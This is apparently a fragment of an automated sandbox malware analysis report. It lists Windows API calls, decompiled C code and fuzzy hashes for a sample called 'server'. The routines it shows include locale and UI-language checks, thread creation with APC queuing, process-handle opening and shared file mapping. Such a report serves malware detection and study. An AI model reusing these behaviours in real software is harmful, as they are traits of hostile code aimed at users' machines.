                      • Part of subcall function 0054154D: RtlAllocateHeap.NTDLL(00000000,?,00541477), ref: 00541559
                    • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00541C8D
                    • Sleep.KERNEL32(00000000,00000030), ref: 00541CD4
                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00541CFC
                    • GetSystemDefaultUILanguage.KERNEL32 ref: 00541D06
                    • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00541D19
                    • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00541D8E
                    • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00541DA4
                    • GetLastError.KERNEL32 ref: 00541DB4
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00541DBE
                    • SetLastError.KERNEL32(00000000), ref: 00541DCA
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00541DD7
                    • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00541DE9
                    • GetLastError.KERNEL32 ref: 00541DF4
                    • GetLastError.KERNEL32 ref: 00541E05
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                    • String ID:
                    • API String ID: 1666582358-0
                    • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                    • Instruction ID: c53088000c7f29f6ac30ad47b36a3707e8ddd0a3eb4632b5add1956d74544151
                    • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                    • Instruction Fuzzy Hash: 0751A1B5901A15BBE720EFB59D48AEFBF7CBB84759B104025F911E3154D730CE809BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401D68() {
                    				void* _t1;
                    				unsigned int _t3;
                    				void* _t4;
                    				long _t5;
                    				void* _t6;
                    				intOrPtr _t10;
                    				void* _t14;
                    
                    				_t10 =  *0x404170;
                    				_t1 = CreateEventA(0, 1, 0, 0);
                    				 *0x40417c = _t1;
                    				if(_t1 == 0) {
                    					return GetLastError();
                    				}
                    				_t3 = GetVersion();
                    				if(_t3 != 5) {
                    					L4:
                    					if(_t14 <= 0) {
                    						_t4 = 0x32;
                    						return _t4;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					if(_t3 >> 8 > 0) {
                    						L5:
                    						 *0x40416c = _t3;
                    						_t5 = GetCurrentProcessId();
                    						 *0x404168 = _t5;
                    						 *0x404170 = _t10;
                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                    						 *0x404164 = _t6;
                    						if(_t6 == 0) {
                    							 *0x404164 =  *0x404164 | 0xffffffff;
                    						}
                    						return 0;
                    					} else {
                    						_t14 = _t3 - _t3;
                    						goto L4;
                    					}
                    				}
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                    • GetVersion.KERNEL32 ref: 00401D86
                    • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                    • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: 1ac6c022222df10fddb45b89cce92d0bd369c4a3ad6ba39bd49a2e21b0455d6a
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: EB318AB6910609CFDB10CF99C880AEEBBF9FF48328F24504AD941A7351D771EA45CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: 2c82bd516d6ff097f8176106e61eb0d6ffe2c8492c1e619661976ec5e8f84ee2
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: B801D472A006008FDB21DF60C804BEA37B9FB85309F1544A4DA0697282E370A9458B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0054167F,0000000A,?,?), ref: 00541824
                    • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 00541884
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0054167F,0000000A), ref: 005418AF
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0054167F,0000000A,?,?), ref: 005418D0
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0054167F,0000000A,?,?), ref: 005418D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
                    • String ID:
                    • API String ID: 2685682793-0
                    • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction ID: f6e29ca944e67365e6ae3a2000c8885cbf27dc5ee4e42e954d72adac0d88edef
                    • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction Fuzzy Hash: C12195B2A00208BFD710AFA4DC88EEE7FBDFB44399F104535FA05E7190D67099848B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00542052
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00542062
                    • GetCommandLineW.KERNEL32 ref: 0054206D
                      • Part of subcall function 00541C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00541C8D
                      • Part of subcall function 00541C58: Sleep.KERNEL32(00000000,00000030), ref: 00541CD4
                      • Part of subcall function 00541C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00541CFC
                      • Part of subcall function 00541C58: GetSystemDefaultUILanguage.KERNEL32 ref: 00541D06
                      • Part of subcall function 00541C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00541D19
                    • HeapDestroy.KERNEL32 ref: 00542080
                    • ExitProcess.KERNEL32 ref: 00542087
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
                    • String ID:
                    • API String ID: 1393419808-0
                    • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction ID: 7d4c78cad3f176cd08ce5d6c33f50af62d265402530ecd0bb37f8dad81e814ca
                    • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction Fuzzy Hash: 70E0B6B0843630ABC3216F71BE0CA8E7E68BB59B567000935F605F2125CB384A81CA9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00541C63), ref: 00541FDE
                    • GetVersion.KERNEL32(?,00541C63), ref: 00541FED
                    • GetCurrentProcessId.KERNEL32(?,00541C63), ref: 00542009
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00541C63), ref: 00542022
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction ID: f302b5d79a36a58f73ddd264fac5750a70c4840e0ac5f2e0b5fabbbbc46e58aa
                    • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                    • Instruction Fuzzy Hash: C6F08CB05413209BE7609F78BE0DB953FA4B795752F400035F645FA1E4E7708982CB5C
                    Uniqueness

                    Uniqueness Score: -1.00%